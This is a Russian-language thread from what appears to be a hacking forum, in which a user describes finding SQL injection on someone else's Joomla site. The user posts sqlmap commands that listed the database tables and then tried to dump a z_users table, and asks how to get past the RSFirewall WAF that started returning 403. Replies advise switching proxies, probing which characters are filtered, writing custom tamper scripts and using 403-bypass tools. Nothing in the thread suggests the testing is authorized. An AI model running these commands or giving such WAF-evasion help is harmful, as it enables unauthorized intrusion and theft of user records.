• XSS.stack #1 – первый литературный журнал от юзеров форума

rsfirewall - RSJoomla! Как обойти waf (используя sqlmap)?

Отслеживать
4lav5

4lav5

floppy-диск
Пользователь
Регистрация
26.12.2022
Сообщения
5
Реакции
3
Привет еврибади!
Окунь нашел sqli, через sqlmap удалось получить таблички из БД (тут waf молчит):
sqlmap -u "http://bla-bla-bla.com/galer/*/ansa-1-1" --random-agent --level=5 --risk=3 --ignore-code 500 -D database -T z_users --column

Среди прочих имеются таблицы с именем rsfirewall:
z_rsfirewall_configuration

При попытке дампа таблицы waf стал блочить запросы и кидаться 403.
Перебрал --tamper, результат - 0.
sqlmap -u "http://bla-bla-bla.com/galer/*/ansa-1-1" --random-agent --level=5 --risk=3 --ignore-code 500 -D database -T z_users --dump --proxy=http://localhost:8080 --batch --tamper=overlongutf8.py
Через burp видно, что работает waf.
Подскажите, как обойти waf?
 
Тамперы бы тебе пригодились, если бы изначально WAF какие-то символы банил. А так как какое-то время он тебя не трогал, видимо он забанил твой IP. Попробуй с proxy.
 
4lav5 сказал(а):
Спасибо, бро! Но это не совсем то...
Почему не то? Чекнуть софтом какие сигнатуры блочит waf, а какие нет. Исходя из полученной инфы, составить пейлод для дампа

Как вариант, эти решения попробовать

403 & 401 Bypasses - HackTricks

book.hacktricks.xyz
github.com

GitHub - iamj0ker/bypass-403: A simple script just made for self use for bypassing 403

A simple script just made for self use for bypassing 403 - iamj0ker/bypass-403
github.com
 
Последнее редактирование:
Руками покрути, посмотри что фильтруется, какие символы/слова/комбинации, потом уже тамперы применяй, можно даже свой написать. На форуме вся информация есть, в том числе и я расписывал где-то в этом разделе.
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх